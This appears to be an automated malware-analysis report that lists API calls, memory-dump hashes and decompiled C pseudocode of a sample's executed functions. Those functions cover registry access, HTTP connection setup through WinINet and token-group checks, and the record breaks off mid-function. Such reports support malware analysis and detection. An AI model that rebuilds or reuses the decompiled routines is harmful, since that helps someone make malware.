    • #5575.MFC42(80020004,0000000A,00000000,00000002,00000001,00000002), ref: 004020BE
    • #5575.MFC42(80020004,0000000A,00000000,00000002,00000001,00000002), ref: 004020CA
    • #5575.MFC42(80020004,0000000A,00000000,00000002,00000001,00000002), ref: 004020D6
    • #9.OLEAUT32(?,80020004,0000000A,00000000,00000002,00000001,00000002), ref: 004020E3
    • #9.OLEAUT32(?), ref: 004020F1
    • #9.OLEAUT32(?), ref: 00402102
    Memory Dump Source
    • Source File: 00000000.00000001.328251298.0000000000400000.00000002.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: #5575$#434$#464$#1669#465
    • String ID:
    • API String ID: 918964270-0
    • Opcode ID: 5249fbbd2fbec79a21ddf6da1d4f8e48b637fd065f7794585851135324101570
    • Instruction ID: a99555386ed46a1410cd316f3afd82919259b6b1b03cde1c42c6a689c00be722
    • Opcode Fuzzy Hash: 5249fbbd2fbec79a21ddf6da1d4f8e48b637fd065f7794585851135324101570
    • Instruction Fuzzy Hash: 12312170805288EADB05EBA4DB9EBDCBB74AF11308F6081ADE511771D2DBBC1B08DB55
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • GetCommandLineA.KERNEL32 ref: 00401D67
    • HideCaret.USER32(00000000), ref: 00401D6F
    • GetDesktopWindow.USER32 ref: 00401D75
    • GetCommandLineA.KERNEL32 ref: 00401D7B
    • RegisterClipboardFormatW.USER32(00000000), ref: 00401D83
    • CreateCompatibleDC.GDI32(00000000), ref: 00401D8B
    • PeekMessageW.USER32(00000000,00000000,00000000,00000000,00000000), ref: 00401D9B
    • GetACP.KERNEL32 ref: 00401DA1
    • GetEnvironmentStrings.KERNEL32 ref: 00401DA7
    • GetClientRect.USER32(00000000,00000000), ref: 00401DB1
    • GetDateFormatA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00401DC3
    • GetCursorPos.USER32(00000000), ref: 00401DCB
    • HeapReAlloc.KERNEL32(00000000,00000000,00000000,00000000), ref: 00402879
    Memory Dump Source
    • Source File: 00000000.00000002.333287834.0000000000400000.00000002.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.333310503.0000000000405000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.333314759.0000000000406000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.333337535.0000000000408000.00000002.00020000.sdmp
    Similarity
    • API ID: CommandFormatLine$AllocCaretClientClipboardCompatibleCreateCursorDateDesktopEnvironmentHeapHideMessagePeekRectRegisterStringsWindow
    • String ID:
    • API String ID: 1244642730-0
    • Opcode ID: 3566cb7b843034e973bab0e95ff240c53ab780565685a93776f49c83a6b60d9e
    • Instruction ID: af9d4de3cf86c2f6b80bec87d207abd21e06541653e40ff6df8a1295e72425d5
    • Opcode Fuzzy Hash: 3566cb7b843034e973bab0e95ff240c53ab780565685a93776f49c83a6b60d9e
    • Instruction Fuzzy Hash: 15F0077529A240EBE2507FA1EF0EB087E3CAB04B43F1041B5F306B91F58AB457448B2E
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • UpdateWindow.USER32(00000000), ref: 00401DE1
    • GetOEMCP.KERNEL32 ref: 00401DE7
    • HeapDestroy.KERNEL32(00000000), ref: 00401DEF
    • ShowWindow.USER32(00000000,00000000), ref: 00401DF9
    • GetCaretBlinkTime.USER32 ref: 00401DFF
    • SetStdHandle.KERNEL32(00000000,00000000), ref: 00401E09
    • FlushFileBuffers.KERNEL32(00000000), ref: 00401E11
      • Part of subcall function 00401E70: #6215.MFC42(00000000), ref: 00401E85
    • #2379.MFC42 ref: 00401E26
    Memory Dump Source
    • Source File: 00000000.00000002.333287834.0000000000400000.00000002.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.333310503.0000000000405000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.333314759.0000000000406000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.333337535.0000000000408000.00000002.00020000.sdmp
    Similarity
    • API ID: Window$#2379#6215BlinkBuffersCaretDestroyFileFlushHandleHeapShowTimeUpdate
    • String ID:
    • API String ID: 3091587674-0
    • Opcode ID: cb7df9ebdcdb3c6dd5c1f0e0f5033e8655c62a5119d6ff19a90f684e00c90495
    • Instruction ID: 8831d63713359388988f6f63f2f7d58f073549cc635a453978b6df9dfabe448d
    • Opcode Fuzzy Hash: cb7df9ebdcdb3c6dd5c1f0e0f5033e8655c62a5119d6ff19a90f684e00c90495
    • Instruction Fuzzy Hash: 06E07D31645204ABE650AFA1EE0EB5D7F68AB04703F1040B5FB0AB91F4CA745A008B69
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • GetCommandLineA.KERNEL32 ref: 00401D67
    • GetCommandLineA.KERNEL32 ref: 00401D7B
    • CreateCompatibleDC.GDI32(00000000), ref: 00401D8B
    • GetACP.KERNEL32 ref: 00401DA1
    • GetEnvironmentStrings.KERNEL32 ref: 00401DA7
    • GetDateFormatA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00401DC3
    • HeapReAlloc.KERNEL32(00000000,00000000,00000000,00000000), ref: 00402879
    Memory Dump Source
    • Source File: 00000000.00000001.328251298.0000000000400000.00000002.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CommandLine$AllocCompatibleCreateDateEnvironmentFormatHeapStrings
    • String ID:
    • API String ID: 3564124098-0
    • Opcode ID: 3566cb7b843034e973bab0e95ff240c53ab780565685a93776f49c83a6b60d9e
    • Instruction ID: af9d4de3cf86c2f6b80bec87d207abd21e06541653e40ff6df8a1295e72425d5
    • Opcode Fuzzy Hash: 3566cb7b843034e973bab0e95ff240c53ab780565685a93776f49c83a6b60d9e
    • Instruction Fuzzy Hash: 15F0077529A240EBE2507FA1EF0EB087E3CAB04B43F1041B5F306B91F58AB457448B2E
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • GetOEMCP.KERNEL32 ref: 00401DE7
    • HeapDestroy.KERNEL32(00000000), ref: 00401DEF
    • SetStdHandle.KERNEL32(00000000,00000000), ref: 00401E09
    • FlushFileBuffers.KERNEL32(00000000), ref: 00401E11
      • Part of subcall function 00401E70: #6215.MFC42(00000000), ref: 00401E85
    • #2379.MFC42 ref: 00401E26
    Memory Dump Source
    • Source File: 00000000.00000001.328251298.0000000000400000.00000002.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: #2379#6215BuffersDestroyFileFlushHandleHeap
    • String ID:
    • API String ID: 3744095458-0
    • Opcode ID: cb7df9ebdcdb3c6dd5c1f0e0f5033e8655c62a5119d6ff19a90f684e00c90495
    • Instruction ID: 8831d63713359388988f6f63f2f7d58f073549cc635a453978b6df9dfabe448d
    • Opcode Fuzzy Hash: cb7df9ebdcdb3c6dd5c1f0e0f5033e8655c62a5119d6ff19a90f684e00c90495
    • Instruction Fuzzy Hash: 06E07D31645204ABE650AFA1EE0EB5D7F68AB04703F1040B5FB0AB91F4CA745A008B69
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • #446.MFC42(00403380,8P@,00000001,WordAutomation.Application,00401235), ref: 00401256
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.333287834.0000000000400000.00000002.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.333310503.0000000000405000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.333314759.0000000000406000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.333337535.0000000000408000.00000002.00020000.sdmp
    Similarity
    • API ID: #446
    • String ID: 8P@$WordAutomation.Application$o@
    • API String ID: 3291608302-24086771
    • Opcode ID: 6d89bb63c30bdc4a857ca23dcafdc35bd528b75dd9dda83e25fddc2dda30a4cb
    • Instruction ID: 23b2b5def2a953660c0bbce8edcddb18257bcf876159122dd0a38a8143af38d3
    • Opcode Fuzzy Hash: 6d89bb63c30bdc4a857ca23dcafdc35bd528b75dd9dda83e25fddc2dda30a4cb
    • Instruction Fuzzy Hash: C4B012203C030130DD1429010C43F4A08055340F05DA0407FB7023C0C18CFE0254008C
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • #324.MFC42(00000066,00000000,?,?,00000000,00402718,000000FF,00401460,00000000), ref: 004015E4
    • #1168.MFC42(00000066,00000000,?,?,00000000), ref: 004015F7
    • #1146.MFC42(00000080,0000000E,00000080,00000066,00000000,?,?,00000000), ref: 00401608
    • LoadIconA.USER32(00000000,00000080), ref: 0040160E
    Memory Dump Source
    • Source File: 00000000.00000002.333287834.0000000000400000.00000002.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.333310503.0000000000405000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.333314759.0000000000406000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.333337535.0000000000408000.00000002.00020000.sdmp
    Similarity
    • API ID: #1146#1168#324IconLoad
    • String ID:
    • API String ID: 193567849-0
    • Opcode ID: af2a4761585203f4bec0e87f8bd8e8a73c99d675b7b2cd13ce05c823f6c019d7
    • Instruction ID: 718a584e9d37f4746e91c8a82ad397b6e7f3e9142889a7192b32e25e0e426896
    • Opcode Fuzzy Hash: af2a4761585203f4bec0e87f8bd8e8a73c99d675b7b2cd13ce05c823f6c019d7
    • Instruction Fuzzy Hash: A9F054B1644750ABE310DF59CA06B06BBD8FB44B10F004A2EF595B77C0C7FD54048B55
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • #290.MFC42(?,00000000,00000000,004026B8,000000FF,00401037), ref: 0040109D
    • #2623.MFC42(?,00000000,00000000,004026B8,000000FF,00401037), ref: 004010B2
    • #1206.MFC42(?,00000000,00000000,004026B8,000000FF,00401037), ref: 004010B7
    • #1168.MFC42(?,00000000,00000000,004026B8,000000FF,00401037), ref: 004010BC
    Memory Dump Source
    • Source File: 00000000.00000001.328251298.0000000000400000.00000002.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: #1168#1206#2623#290
    • String ID:
    • API String ID: 2814418969-0
    • Opcode ID: c1b2bb519df6d6a38c27ec1491882f25e6dcda16a4c0156bc26f718283f4215e
    • Instruction ID: ecd3140fac416fe4891ce4795e697a4ea0f3ddb15ac72dfb7578db4491d0a0dd
    • Opcode Fuzzy Hash: c1b2bb519df6d6a38c27ec1491882f25e6dcda16a4c0156bc26f718283f4215e
    • Instruction Fuzzy Hash: 3DF08274500650DFC314EF08C605B097BE8FB08B10F004A6FF444AB7C1C7BC88408B95
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • #446.MFC42(00403380,8P@,00000001,00405054,00401235), ref: 00401256
    Strings
    Memory Dump Source
    • Source File: 00000000.00000001.328251298.0000000000400000.00000002.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: #446
    • String ID: 8P@$o@
    • API String ID: 3291608302-1213915778
    • Opcode ID: 6d89bb63c30bdc4a857ca23dcafdc35bd528b75dd9dda83e25fddc2dda30a4cb
    • Instruction ID: 23b2b5def2a953660c0bbce8edcddb18257bcf876159122dd0a38a8143af38d3
    • Opcode Fuzzy Hash: 6d89bb63c30bdc4a857ca23dcafdc35bd528b75dd9dda83e25fddc2dda30a4cb
    • Instruction Fuzzy Hash: C4B012203C030130DD1429010C43F4A08055340F05DA0407FB7023C0C18CFE0254008C
    Uniqueness

    Uniqueness Score: -1.00%

    Executed Functions

    C-Code - Quality: 82%
    			E00404E70(void** __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
    				void* _v4;
    				char _v24;
    				intOrPtr _v28;
    				void* _v32;
    				void* _v36;
    				void** _v40;
    				char _v44;
    				char _v48;
    				void** _v52;
    				char _v56;
    				intOrPtr _v60;
    				char _v64;
    				char _v68;
    				intOrPtr _v72;
    				intOrPtr _v76;
    				char _v80;
    				char _v84;
    				int _v88;
    				void* _v92;
    				char _v96;
    				intOrPtr _v100;
    				void** _v104;
    				void** _v108;
    				void** _v112;
    				intOrPtr _v116;
    				long _v120;
    				long _v124;
    				void* _v128;
    				void* _v132;
    				void* _v148;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				void* __ebp;
    				void* _t93;
    				intOrPtr _t94;
    				void* _t96;
    				void* _t104;
    				long _t108;
    				intOrPtr* _t110;
    				intOrPtr* _t118;
    				intOrPtr* _t122;
    				void* _t125;
    				long _t130;
    				intOrPtr _t150;
    				void* _t153;
    				char* _t154;
    				intOrPtr _t160;
    				long _t174;
    				long _t176;
    				void** _t184;
    				intOrPtr _t185;
    				void* _t186;
    				int _t188;
    				char* _t190;
    				void** _t191;
    				void* _t192;
    				void* _t193;
    
    				_t192 =  &_v96;
    				_t184 = __ecx;
    				_t150 = _a8;
    				_t172 = _a4;
    				 *((intOrPtr*)(__ecx)) = _a12;
    				_t187 = __ecx + 8;
    				_t93 =  *(__ecx + 8);
    				 *((intOrPtr*)(__ecx + 0x10)) = _t150;
    				if(_t93 != _a4) {
    					E0040EA50(_t187, _t172, 0);
    					_t93 = _t184[2];
    				}
    				_push(0x2f);
    				_push(_t93);
    				_t94 = E00404DC0();
    				_t193 = _t192 + 8;
    				if(_t94 == 0) {
    					_t191 = 0;
    					E0040E710( &_v56, _t172, _t187);
    					L11:
    					_t96 = E00405240( &_v56);
    					_push(0x5c);
    					E00405180(_t96, _t187,  &_v36);
    					E0040DEA0(_t150,  &_v64, _t184);
    					E0040BAB4(_v52);
    					_t102 = _v44;
    					_v52 = _t191;
    					_v48 = _t191;
    					if(_v44 != _t184[2]) {
    						E0040EA50(_t187, _t102, 0);
    						_t102 = _v48;
    					}
    					E0040BAB4(_t102);
    					_t104 = _t184[1];
    					_v40 = _t191;
    					_v36 = _t191;
    					if(_t104 != 0 && _t104 != 0xffffffff) {
    						E0040BA8C(_t104, _t187, _t104);
    					}
    					_t184[1] = 0;
    					if(_t150 == 1 || _t150 == 2) {
    						_t188 = 0x2010b;
    					} else {
    						_t188 = 0x20109;
    					}
    					_v32 = 0;
    					E0040E4B4(0xb9, _t188);
    					_t108 = RegOpenKeyExA( *_t184, _t184[2], 0, _t188,  &_v32); // executed
    					_t174 = _t108;
    					if(_t174 == 2) {
    						if(_t150 == 2) {
    							_v88 = 0;
    							_t110 = E0040E4B4(0xbd, _t188);
    							E00408B38( &_v96, 1);
    							 *_t110(_v96, 1,  &_v88, 0);
    							E0040BAB4(_v112);
    							_t176 =  *0x40f028; // 0xc
    							_t160 =  *0x40f030; // 0x0
    							_v112 = _t191;
    							_v108 = _t191;
    							_v124 = _t176;
    							_v116 = _t160;
    							_v120 = _v104;
    							_t118 = E0040E4B4(0xb5, _t188);
    							_v116 =  *_t118( *_t184, _t184[2], _t191, _t191, _t191, _t188,  &_v124,  &_v48, _t191);
    							_t122 = E0040E4B4(0x62, _t188);
    							 *_t122( *((intOrPtr*)(_t193 + 0x1c)));
    							_t174 = _v120;
    						} else {
    							E0040E4B4(0xb9, _t188);
    							_t130 = RegOpenKeyExA( *_t184, _t184[2], 0, _t188,  &_v32); // executed
    							_t174 = _t130;
    						}
    					}
    					_t153 = _v88;
    					if(_t153 != 0) {
    						_t125 = _t184[1];
    						if(_t125 == 0 || _t125 == 0xffffffff) {
    							_t184[1] = _t153;
    						} else {
    							_v120 = _t174;
    							E0040BA8C(_t125, _t188, _t125);
    							_t174 = _v124;
    							_t184[1] = _t153;
    						}
    					}
    					return _t174;
    				}
    				_t191 = 0;
    				_v80 = 0;
    				_v76 = 0;
    				_v72 = 0;
    				_v68 = 0;
    				_v64 = 0;
    				_v96 = _t94;
    				E0040E280( &_v68, _t187, 0);
    				_t154 =  &_v84;
    				_v104 = _t187;
    				_t190 = _t184[2];
    				_v108 = _t184;
    				_t185 = _v100;
    				do {
    					_v24 = _t191;
    					_t186 = _t185 - _t190;
    					 *((intOrPtr*)(_t193 + 0x5c)) = _t191;
    					if(_t186 == 0) {
    						E0040E280( &_v24, _t190, 0);
    					} else {
    						E0040EA50( &_v24, _t190, _t186);
    					}
    					E0040E200(_t154, _v24);
    					E0040BAB4(_v28);
    					_v28 = _t191;
    					_t190 =  &(_t190[_t186 + 1]);
    					_v24 = _t191;
    					_push(0x2f);
    					_push(_t190);
    					_t185 = E00404DC0();
    					_t193 = _t193 + 8;
    				} while (_t185 != 0);
    				_t187 = _v100;
    				_t184 = _v104;
    				_t150 = _a8;
    				E0040E200( &_v80, _t190);
    				_v60 = _t191;
    				_v56 = _t191;
    				_v52 = _t191;
    				_v48 = _t191;
    				_v44 = _t191;
    				E0040E280( &_v48, _v100, _t191);
    				if( &_v88 !=  &_v64) {
    					_push( &_v80);
    					E00409F80(_t150,  &_v56);
    				}
    				E0040DEA0(_t150,  &_v80, _t184);
    				E0040BAB4(_v68);
    				_v68 = _t191;
    				_v64 = _t191;
    				goto L11;
    			}

    APIs
    • RegOpenKeyExA.KERNELBASE(?,?,00000000,0002010B,00000000), ref: 00405053
    • RegOpenKeyExA.KERNELBASE(?,?,00000000,0002010B,00000000), ref: 004050BC
      • Part of subcall function 0040BA8C: RegCloseKey.KERNELBASE(00000000,0002010B,?,0040507A,00000000), ref: 0040BA9B
    Memory Dump Source
    • Source File: 00000001.00000001.333141207.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.333190460.0000000000418000.00000040.00020000.sdmp
    Similarity
    • API ID: Open$Close
    • String ID:
    • API String ID: 3083169812-0
    • Opcode ID: 19371cce9a55844af04d65ca323a99e56dcb63b54544c5e1e035a03b719da0dd
    • Instruction ID: cd89e72e798a852671a518b10a10e0bc67fe3e59a4973e81a71b1982d664136a
    • Opcode Fuzzy Hash: 19371cce9a55844af04d65ca323a99e56dcb63b54544c5e1e035a03b719da0dd
    • Instruction Fuzzy Hash: 80914871608705ABC310EF56C880A5BFBE4EFC4744F10892EF595A7291DB39E815CF9A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 91%
    			E0040A040(void* __ecx, intOrPtr* _a4) {
    				void* _v44;
    				void* _v48;
    				WCHAR* _v52;
    				WCHAR* _v56;
    				char _v60;
    				char _v64;
    				void* _v68;
    				WCHAR* _v84;
    				char _v88;
    				WCHAR* _v92;
    				void* _v96;
    				WCHAR* _v100;
    				signed int _v104;
    				WCHAR* _v112;
    				WCHAR* _v116;
    				WCHAR* _v120;
    				WCHAR* _v124;
    				WCHAR* _v128;
    				WCHAR* _v132;
    				char _v136;
    				void* _v140;
    				WCHAR* _v144;
    				WCHAR* _v148;
    				WCHAR* _v156;
    				void* _v160;
    				void* _v164;
    				char _v168;
    				void* _v180;
    				void* _v212;
    				void* __edi;
    				void* __esi;
    				char* _t91;
    				void* _t94;
    				void* _t95;
    				void* _t96;
    				void* _t107;
    				void* _t108;
    				void* _t111;
    				intOrPtr* _t119;
    				intOrPtr* _t123;
    				void* _t135;
    				void* _t136;
    				intOrPtr _t144;
    				short _t154;
    				void* _t156;
    				void* _t158;
    				void* _t159;
    				void* _t160;
    				char* _t161;
    				WCHAR** _t163;
    
    				_t163 =  &_v92;
    				_t136 = __ecx;
    				_push( *_a4);
    				E0040A450( &_v100);
    				_t154 = _v104;
    				_v60 = 0;
    				_v56 = 0;
    				E0040E060( &_v60, _t156, 0);
    				E0040A358( &_v56);
    				E0040A358( &_v48);
    				_t157 = E0040E340( &_v64, _t154, _t156, _v48);
    				E0040A358( &_v44);
    				E0040E340(_t83, _t154, _t83, _v44);
    				E0040BAB4(_v48);
    				_v48 = 0;
    				_v44 = 0;
    				E0040BAB4(_v56);
    				_t91 = _v112;
    				_v56 = 0;
    				_v52 = 0;
    				if(_t91 != 0 &&  *_t91 != 0) {
    					_t135 = E0040C700( &_v100);
    					if(_t135 != 0x97780db2) {
    						if(_t135 == 0x3ef665a6) {
    							 *((intOrPtr*)(_t136 + 0xc)) = 1;
    						}
    					} else {
    						 *((intOrPtr*)(_t136 + 0xc)) = 0;
    					}
    				}
    				E0040E4B4(0x13a, _t157);
    				_t94 =  *0x416c24; // 0xffffffff
    				_t95 = InternetConnectW(_t94, _v52, _t154, 0, 0, 3, 0, 0); // executed
    				_t158 = _t95;
    				_t96 =  *(_t136 + 4);
    				if(_t96 != 0 && _t96 != 0xffffffff) {
    					_t96 = E0040AF54(_t96, _t158, _t96);
    				}
    				 *(_t136 + 4) = _t158;
    				if(_t158 == 0 || _t158 == 0xffffffff) {
    					E0040EAB0();
    					 *(_t136 + 0x3c) = _t96;
    					E0040BAB4(_v84);
    					_v84 = 0;
    					_t163[0x10] = 0;
    					E0040BAB4(_v92);
    					_v92 = 0;
    					_v88 = 0;
    					E0040A300( &_v136);
    					return 0;
    				} else {
    					if( *((intOrPtr*)(_t136 + 0xc)) == 1) {
    						_v56 = 0x803200;
    					} else {
    						_v56 = 0x3200;
    					}
    					E0040E4B4(0x13e, _t158);
    					_t159 =  *(_t136 + 4);
    					if( *((intOrPtr*)(_t136 + 0x10)) == 1) {
    						E00408B38( &_v100, 0xc);
    					} else {
    						E00408B38( &_v100, 0xb);
    					}
    					_t107 = HttpOpenRequestW(_t159, _v100, _v92, 0, 0, 0, _v56, 0); // executed
    					_t160 = _t107;
    					_t108 =  *(_t136 + 8);
    					if(_t108 != 0 && _t108 != 0xffffffff) {
    						E0040AF54(_t108, _t160, _t108);
    					}
    					 *(_t136 + 8) = _t160;
    					E0040BAB4(_v132);
    					_t111 =  *(_t136 + 8);
    					_v132 = 0;
    					_v128 = 0;
    					if(_t111 == 0 || _t111 == 0xffffffff) {
    						E0040EAB0();
    						 *(_t136 + 0x3c) = _t111;
    						E0040BAB4(_v116);
    						_v116 = 0;
    						_v112 = 0;
    						E0040BAB4(_v124);
    						_v124 = 0;
    						_v120 = 0;
    						E0040A300( &_v168);
    						return 0;
    					} else {
    						_t144 =  *0x416c28; // 0x21436587
    						if(_t144 != 0x21436587) {
    							E0040A760(_t144, _t111);
    						}
    						_v92 = 4;
    						_t119 = E0040E4B4(0x142, _t160);
    						_t161 =  &_v88;
    						 *_t119( *(_t136 + 8), 0x1f, _t161,  &_v92);
    						_v104 = _v104 | 0x00000100;
    						_t123 = E0040E4B4(0x144, _t161);
    						 *_t123( *(_t136 + 8), 0x1f, _t161, _t163[0x15]);
    						E0040BAB4(_v148);
    						_v148 = 0;
    						_v144 = 0;
    						E0040BAB4(_v156);
    						_v156 = 0;
    						_t163[0xe] = 0;
    						E0040A300( &(_t163[2]));
    						return 1;
    					}
    				}
    			}

    APIs
      • Part of subcall function 0040BAB4: RtlFreeHeap.NTDLL(00000000,00000000), ref: 0040BAFC
    • InternetConnectW.WININET(FFFFFFFF,?,?,00000000,00000000,00000003,00000000,00000000,?,?,00000000,?,?,?,?,00000000), ref: 0040A124
    • HttpOpenRequestW.WININET(?,?,?,00000000,00000000,00000000,?,00000000), ref: 0040A19E
    Memory Dump Source
    • Source File: 00000001.00000001.333141207.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.333190460.0000000000418000.00000040.00020000.sdmp
    Similarity
    • API ID: ConnectFreeHeapHttpInternetOpenRequest
    • String ID:
    • API String ID: 3083932-0
    • Opcode ID: 53dab6feaeffabdf5c727b88feeedd516d6e8ac6a1d0f717d65df5a5bd771d52
    • Instruction ID: 8b35432c8cfbd76ae66fb188e58f661d7ddd40942ed190704566a1478e6e8553
    • Opcode Fuzzy Hash: 53dab6feaeffabdf5c727b88feeedd516d6e8ac6a1d0f717d65df5a5bd771d52
    • Instruction Fuzzy Hash: AB716E705043449FC740EF66C880A0BBBF4EF85718F14892EF598AA392DB79D855CB5B
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 87%
    			E00402080(char __edi) {
    				char _v12;
    				void* _v24;
    				long _v28;
    				long _v32;
    				char _v36;
    				char _v40;
    				char _v44;
    				intOrPtr _v48;
    				void* _v52;
    				intOrPtr _v60;
    				long _v64;
    				char _v68;
    				char _v72;
    				void* _v76;
    				char _v84;
    				int _v88;
    				char _v92;
    				void* _v96;
    				void* _v104;
    				void* _v120;
    				void* _v128;
    				void* __esi;
    				intOrPtr* _t44;
    				int _t47;
    				int _t54;
    				int _t57;
    				int* _t61;
    				int _t68;
    				int _t69;
    				intOrPtr* _t75;
    				int _t76;
    				int _t77;
    				int _t84;
    				int _t92;
    				intOrPtr _t102;
    				char _t105;
    				int* _t106;
    				void* _t109;
    				signed int _t110;
    				intOrPtr* _t111;
    				int* _t113;
    				int _t114;
    				void* _t115;
    
    				_t105 = __edi;
    				_t115 =  &_v52;
    				_v12 = 0;
    				_t44 = E0040E4B4(0xb0, _t109);
    				_t111 = _t44;
    				if(_t111 == 0) {
    					L7:
    					return 0;
    				} else {
    					E004081C0();
    					_t47 =  *_t111(_t44, 8,  &_v12);
    					if(_t47 == 0) {
    						E0040EAB0();
    						__eflags = _t47;
    						if(_t47 != 0) {
    							goto L7;
    						} else {
    							goto L2;
    						}
    					} else {
    						L2:
    						_v36 = _v24;
    						_v32 = 1;
    						_v28 = 0;
    						if(E0040E4B4(0xae, _t109) != 0) {
    							_t84 = GetTokenInformation(_v24, 2, 0, 0,  &_v28); // executed
    							if(_t84 == 0) {
    								E0040EAB0();
    							}
    						}
    						_t51 = _v28;
    						if(_v28 != 0) {
    							E00407450( &_v68, _t51);
    							_t54 = E0040E4B4(0xae, _t109);
    							__eflags = _t54;
    							if(_t54 != 0) {
    								_t57 = GetTokenInformation(_v28, 2, E00409700( &_v68, 0), _v64,  &_v32); // executed
    								__eflags = _t57;
    								if(_t57 == 0) {
    									E0040EAB0();
    									__eflags = _t57;
    									if(_t57 != 0) {
    										goto L9;
    									} else {
    										goto L13;
    									}
    								} else {
    									L13:
    									_t110 = 0;
    									_t61 = E00409700( &_v72, 0);
    									_t102 =  *0x40f020; // 0x0
    									_t113 = _t61;
    									_v48 = 0;
    									_v60 = _t102;
    									 *((short*)(_t115 + 0x18)) =  *0x40f024 & 0x0000ffff;
    									_t92 = E0040E4B4(0x98, 0);
    									__eflags = _t92;
    									if(_t92 == 0) {
    										L26:
    										E0040AE90( &_v72, _t110);
    										__eflags = _v36;
    										if(__eflags != 0) {
    											E00408190( &_v40, _t110, __eflags);
    										}
    										__eflags = 0;
    										return 0;
    									} else {
    										_t68 =  *_t92(_t115 + 0x14, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v44);
    										__eflags = _t68;
    										if(_t68 == 0) {
    											E0040EAB0();
    											__eflags = _t68;
    											if(_t68 != 0) {
    												goto L26;
    											} else {
    												goto L15;
    											}
    										} else {
    											L15:
    											_t69 = _v88;
    											__eflags =  *_t113;
    											if( *_t113 <= 0) {
    												L20:
    												__eflags = _t69;
    												if(_t69 != 0) {
    													__eflags = _t69 - 0xffffffff;
    													if(_t69 != 0xffffffff) {
    														E004022D4(_t69, _t110, _t69);
    													}
    												}
    												E0040AE90(_t115 + 4, _t110);
    												__eflags =  *((char*)(_t115 + 0x28));
    												if(__eflags != 0) {
    													E00408190( &_v84, _t110, __eflags);
    												}
    												__eflags = 0;
    												return 0;
    											} else {
    												_v92 = _t105;
    												_t106 = _t113;
    												_t114 = _t69;
    												while(1) {
    													_t75 = E0040E4B4(0xaa, _t110);
    													_t76 =  *_t75(_v88,  *((intOrPtr*)(_t106 + 4 + _t110 * 8)));
    													__eflags = _t76;
    													if(_t76 != 0) {
    														break;
    													}
    													_t110 = _t110 + 1;
    													__eflags = _t110 -  *_t106;
    													if(_t110 <  *_t106) {
    														continue;
    													} else {
    														_t69 = _t114;
    														goto L20;
    													}
    													goto L42;
    												}
    												_t77 = _t114;
    												__eflags = _t77;
    												if(_t77 != 0) {
    													__eflags = _t77 - 0xffffffff;
    													if(_t77 != 0xffffffff) {
    														E004022D4(_t77, _t110, _t77);
    													}
    												}
    												E0040AE90(_t115 + 4, _t110);
    												__eflags = _v88;
    												if(__eflags != 0) {
    													E00408190( &_v92, _t110, __eflags);
    												}
    												return 1;
    											}
    										}
    									}
    								}
    							} else {
    								L9:
    								E0040AE90( &_v72, _t109);
    								__eflags = _v36;
    								if(__eflags != 0) {
    									E00408190( &_v40, _t109, __eflags);
    								}
    								__eflags = 0;
    								return 0;
    							}
    						} else {
    							_t121 = _v32;
    							if(_v32 != 0) {
    								E00408190( &_v36, _t109, _t121);
    							}
    							goto L7;
    						}
    					}
    				}
    				L42:
    			}

    APIs
    • GetTokenInformation.KERNELBASE(?,00000002,00000000,00000000,00000000), ref: 004020EA
    • GetTokenInformation.KERNELBASE(?,00000002,00000000,?,00000000,00000000,00000000), ref: 0040216C
      • Part of subcall function 00408190: FindCloseChangeNotification.KERNELBASE(?,?,00000001,0040E9D8,?,004017A2,00000000), ref: 004081A7
    Memory Dump Source
    • Source File: 00000001.00000001.333141207.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.333190460.0000000000418000.00000040.00020000.sdmp
    Similarity
    • API ID: InformationToken$ChangeCloseFindNotification
    • String ID:
    • API String ID: 671759997-0
    • Opcode ID: 34d2017fdb8c114ed8dcac2f6aa2aa3b84caff5a7dc3344d574dac1ba0fd69c0
    • Instruction ID: 22951e224adcb138652592d388a9d0ea10a4ad4bd3b6d0ab9f307493cc9f1bd9
    • Opcode Fuzzy Hash: 34d2017fdb8c114ed8dcac2f6aa2aa3b84caff5a7dc3344d574dac1ba0fd69c0
    • Instruction Fuzzy Hash: CD51C1312083019AD710EA76CA45B6B77E4AF84318F04497FF984B62D2EBBCCD45C69A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 83%
    			E00402594(void* __eax, void* __eflags) {
    				char _v12;
    				void* _v24;
    				char _v28;
    				void* _v32;
    				char _v36;
    				signed char* _v40;
    				void* _v44;
    				long _v48;
    				char _v52;
    				char _v56;
    				char _v60;
    				char _v64;
    				void* _v68;
